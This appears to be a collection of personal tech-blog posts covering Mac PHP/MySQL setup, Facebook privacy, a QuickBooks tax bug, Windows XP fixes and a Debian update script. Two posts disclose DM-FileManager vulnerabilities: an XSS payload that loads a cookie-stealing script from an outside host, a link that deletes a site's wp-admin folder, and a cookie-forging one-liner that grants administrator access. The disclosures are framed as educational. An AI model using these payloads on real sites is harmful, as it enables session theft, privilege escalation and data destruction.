If you have ever tried compiling the GD library on Mac OS X, you know that there are several issues to overcome before it is usable. Not to mention the version of PHP included with OS X wasn’t compiled with this option. In this post I will detail an easy method to update PHP, install MySQL and the GD library in just a few steps.

To start this process, we need to grab a couple of install packages from the links listed below:

• MySQL for your version of OS X.
• Marc Liyanage’s PHP Apache Module.

Once you have these packages downloaded, we can start by installing MySQL. Open the MySQL image and install the package by following the directions. When the install process finishes, copy the MySQL.prefPane to “your_user/Library/PreferencePanes”. Doing this allows you to start and stop the server from the system preferences window. Finally, make sure you take the time to secure your new installation.

If you had previously enabled the PHP module in the httpd.conf file, make sure you comment it back out.

Using the terminal from: Applications=>Utilities=>Terminal.app
(The following commands are entered without quotes.)

• First type: “vi /etc/apache2/httpd.conf”
• Find the PHP module:
  LoadModule php5_module libexec/apache2/libphp5.so
• Type: “i” and change the line to read:
  #LoadModule php5_module libexec/apache2/libphp5.so
• Now press the “esc” key, type “:wq” and press “enter”

The next step in this process is to install an updated version of PHP with GD support. The great thing about using the Entropy package, is that all of the hard work is already done for you! Open the installer and click the customize button if you don’t need all of the included extensions.

Once you have chosen the extensions you need, click install. When the install finishes, the last thing we need to do is edit the php.ini.

Using the terminal from: Applications=>Utilities=>Terminal.app
(The following commands are entered without quotes.)

• First type: “vi /usr/local/php5/lib/php.ini”
• Now type: “?mysql” and scroll up until you get to the lines that look like this:
  mysql.default_socket = /tmp/mysql.sock
  mysqli.default_socket = /tmp/mysql.sock
• Type “i” and change them to:
  mysql.default_socket = /var/mysql/mysql.sock
  mysqli.default_socket = /var/mysql/mysql.sock
• Finally press the “esc” key, type “:wq” and press “enter”

Now all you have to do is start Web Sharing from the system preferences window and all of your new features will be ready to use.

If you have a Facebook account and haven’t bothered to check your privacy settings lately, you may be surprised to learn just how much any and everyone can find out about you. Due to recent changes in the company’s privacy policy, more of your personal information is now easily accessible in more ways than you can imagine.

Facebook’s idea of privacy is that you, the user, have to police what you share. In other words, it is your responsibility to constantly check your privacy settings to see if any changes have been made and opt out of these changes if you don’t agree. I’m sure that most of you would agree when I say, there are better things to do with your time than to constantly check privacy settings on a website.

Feel free to see for yourself:

1. Once logged in, click on the ‘Account’ button and then ‘Privacy Settings’.
2. Next click on ‘Applications and Websites’, ‘What you Share’ and hidden almost at the bottom of the page click ‘this page’.
3. Make sure you go through each application listed by clicking on ‘Edit Settings’ and secure them to your liking.
4. Now, go back to the ‘Applications and Websites’ page and click on ‘What your friends can show about you’ to edit the options here as well.
5. Finally, back on the ‘Applications and Websites’ page, click on the ‘Instant Personalization Pilot Program’ link and uncheck the box that allows Facebook partners to access your public information when you arrive on their websites.

Once you finish, ask yourself, should I really be forced to put up with this?

I can’t help but remember when everyone I knew was talking about this great new site called MySpace. I remember feeling like maybe I was missing the boat because I hadn’t bought into the hype of creating my account, customizing the page and reconnecting with all of my friends. Don’t get me wrong, I think the social networking phenomenon is a great concept and is obviously widely popular. Many starting bands have had great success using this medium to get their music out there for the world to hear and we are able to communicate with friends and family all over the world for free. With that said, I don’t really regret not buying in to this concept, I just regret not coming up with the idea first. Let’s face it, the idea of exploit my members at every turn in order to make myself more money is just genius.

So why is it that MySpace is not as popular as it once was? Where did they go wrong and can they come back from their downward spiral? Well, to be honest, I’m not really sure and personally don’t even care.

The idea of putting my personal life out there for the world to see, doesn’t appeal to me. Most people will agree that they like their privacy and are often offended when it is violated. However, these same people will put all of their information, pictures and videos out there for the world to see. I haven’t even begun to mentioned the spam and phishing attacks that have plagued these sites since their creation that so many people are fooled by daily. Does anyone see a problem here? What better playground for social engineering and identity theft can you ask for? It’s like a one stop shop for all your criminal needs.

So what are your thoughts on the future of MySpace and/or social networking?

Is the problem a server misconfiguration, outdated WordPress blog, weak passwords or a serious bug in WordPress itself?

If your site has been hacked and you have access to the access_logs, post them along with any other relevant information that you have and as a community let’s go through the information to see if we can find the problem.

In a few cases when I invoice a customer, I will charge them for a product at full price and then a few lines down discount the product to the agreed upon selling price. This helps me to demonstrate the value associated with the services I provide and also allows me to charge more later if the circumstances change. QuickBooks has a special item that is setup for this very discount function.

During my normal day-to-day operations, I received a phone call from a customer that was unable to determine how I arrived at a sales tax figure. Thinking this was a simple error on the customer’s behalf I pulled up the invoice, ran the figures and was shocked when I realized that the math absolutely did not work. Wanting to get to the bottom of this, I asked to call the customer back and began trying to figure the problem out. After working with the problem for a few moments I remembered that my company has a full service plan and decided to call Intuit to report the problem. After jumping through several hoops and being transferred to a level 2 support member, I was told that this was expected behavior. The invoice in question had taxable and non-taxable items on it with the discount appearing at the very bottom of the invoice. She explained that the QuickBooks calculator added all the items up as it went along and when it encountered a discount it treated it as a payment and reduced the previous line items by a percentage.

Let see an example:

Our tax amount will be 8%.
Now we have an item that costs $1 and is taxable: $1 x 8% = $1.08
Another item for $1 that is not taxable: $1 x 0% = $1
A discount of $1 that is also taxable: $1.08 + $1 = 2.08 – $1.08 = $1

Now here is a screen shot from QuickBooks with the same problem:
(Click to enlarge)

As you can see, QuickBooks manages to figure this total to be $1.04. She then explained that the work around to this problem was to add all of the taxable items first, then use the taxable discount and finally add the non-taxable items and a non-taxable discount if needed. I asked if this was going to be improved and was told that I could submit this as a suggestion for a future version as an improvement.

This just goes to show you that you can’t always trust shiny software even if you pay for it and you should always double check your math.

During this review process, there were several issues found and we will be posting them in the coming weeks for educational purposes. It is our hope that this information will be used to help others write more secure code and realize the dangers involved with these mistakes.

DM-FileManager 3.9.9 and below is vulnerable to XSS via the message variable not being properly sanitized.

This example shows nDarkness.com in an iframe within the login page:

http://localhost/~safety/dm-filemanager/login.php?referrer=/&message=<p align=center><iframe src=http://ndarkness.com width=100% height=800></iframe></p>

Here is a url encoded version:

http://localhost/~safety/dm-filemanager/login.php?referrer=/&message=%3C%70%20%61%6C%69%67%6E%3D%63%65%6E%74%65%72%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%6E%64%61%72%6B%6E%65%73%73%2E%63%6F%6D%20%77%69%64%74%68%3D%31%30%30%25%20%68%65%69%67%68%74%3D%38%30%30%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%70%3E

and one step farther is the cookie stealer script:

http://localhost/~safety/dm-filemanager/login.php?referrer=/&message=<SCRIPT SRC=http://blog.ndarkness.com/get-cookie.js></SCRIPT>

Here is a url encoded version:

http://localhost/~safety/dm-filemanager/login.php?message=%3C%53%43%52%49%50%54%20%53%52%43%3D%68%74%74%70%3A%2F%2F%62%6C%6F%67%2E%6E%64%61%72%6B%6E%65%73%73%2E%63%6F%6D%2F%67%65%74%2D%63%6F%6F%6B%69%65%2E%6A%73%3E%3C%2F%53%43%52%49%50%54%3E

A common exploit for this would be to make up a bug report and alert the site owner of the situation in the hopes that they were logged in when they clicked the link above. The next step would be to use session hijacking to steal the user’s session.

Another option is to call the delete folder ajax.php command and let the user delete directories off of their site.

http://localhost/~safety/dm-filemanager/login.php?referrer=/&message=http://localhost/~safety/dm-filemanager/ajax.php?currdir=/safety/Sites/wp/&rmdir=yes&folder=/safety/Sites/wp/wp-admin&dir=wp-admin

DM-Filemanager users should not follow untrusted links and should upgrade to the latest version.

During this review process, there were several issues found and we will be posting them in the coming weeks for educational purposes. It is our hope that this information will be used to help others write more secure code and realize the dangers involved with these mistakes.

The first major issue we found was with DM-Albums version 2.0. After reviewing this software and helping to add greater support for WPMU installations, we moved on to DM-FileManager version 3.9.6. The fist major issue we found with this software prompted us to take a deeper look at the authorization model used by this file manager software. Below is the vulnerable code and the method used to exploit it. Please be aware that this has since been fixed and is no longer vulnerable.

I discovered that cookie variables were being used to determine a users ability to access certain features of the software. The cookies I found that mattered were:

GROUP=ADMINISTRATORS; GROUPID=1;

The group id cookie gives you the admin.php button (footer.php, line 49) – Not necessary but it was a start.

if($GROUPID == 1)
{
	print(" <a href=\"admin.php\" class=\"admin\"><img src=\"ui/$USERINTERFACE/png/admin.png\" border=\"0\" height=\"15\"/></a> ");
}

Being in the administrator group (admin.php, line 116) lets you use the admin.php page.

if($GROUP != "ADMINISTRATORS") redirect("/?currdir=$currdir");

To exploit this we used javascript injection. From the log in page I entered the following in the address bar and reloaded the page:

javascript:void(document.cookie="GROUP=ADMINISTRATORS");void(document.cookie="GROUPID=1");

When the page reloaded, the admin button was in the footer of the page and it allowed me to use the admin.php page. Once in the admin interface you have full control of the file manager software and can for example, change the admins email address to yours and use the forgot password feature to receive the admins unencrypted password (more on this issue in future posts).

All DM-FileManager users are strongly encouraged to upgrade their software to the latest version.

This causes your roaming profile to refuse to load or breaks NetBIOS connections even after a reboot of the system. You are still able to connect to network shares if you use the ip address of the network computer(s). To correct this problem, go to My Computer=>Tools=>Folder Options=>Offline Files. This will open the screen pictured below.

Now what you need to do is hold down Ctrl+Shift and click on Delete Files. Answer yes to the confirmation prompt, click ok and then restart your computer. After the restart, you will find that your profile loads normally and there are no more connection issues involving NetBIOS names.

Below are the steps I use to free up space on these machines:

1. Click Start => My Computer
2. Now we want to right click on the drive that Windows is installed on and click on Properties.
3. Once the properties dialog opens, click on Disk Cleanup. (This will take a few seconds to minutes to load)

The next steps require a little more explanation.

Before we use Disk Cleanup to get rid of any files, let’s click on the more options tab. This tab allows us to remove components, installed programs that we don’t use and old system restore points. Assuming you have system restore enabled, which by default it is, you will be able to regain a considerable amount of space by selecting this option.

Look at the amount of free space you have and remember the number. Now click on the Clean Up button for System Restore and answer yes to the prompt. You will not see any progress bar or get confirmation that this operation has completed. Wait about 10 seconds and view your free space again. Did the number change? When I did this on my computer I regained a little over 3 gigs!

Now click back on the Disk Cleanup tab. This tab gives us a list of file types with the amount of space they take up plus their descriptions down below. Click on each one to find out what they do to help you decide if you should delete them or not. I typically delete everything except for Office setup files and I don’t compress old files. Once you have the files you want to remove selected click on ok and answer yes to the prompt.

That’s pretty much sums up the process I use to reclaim drive space on Windows XP machines.

The two commands used to update a Debian based system are:

safety@nDarkness:~/bin$ sudo apt-get update; sudo apt-get upgrade

Now while this doesn’t require a great deal of typing, let’s see if we can shorten it to suit our needs.

If you do not already have somewhere to store your personal scripts, the following command will do this for you and allow you to enter the code we will use:

safety@nDarkness:~$ mkdir bin; cd bin; vi apt-auto

Press i for insert and create the following script:

#!/bin/bash

sudo apt-get update; sudo apt-get upgrade

This is all we need to type for our script to produce the results we are looking for. Now let’s save our script by pressing Esc => :wq => .

To run our script we can type:

safety@nDarkness:~/bin$ bash ./apt-auto

You should see the output from the two commands used in the script printed to the screen. Now let’s make our script executable so we don’t have to type bash to make it run.

The following command will accomplish what we are looking for:

safety@nDarkness:~/bin$ chmod +x apt-auto

Now to run our command we simply need to type:

safety@nDarkness:~/bin$ ./apt-auto

We now have a working script to do our update process and it is significantly shorter than the first option we used. As always all comments are welcomed.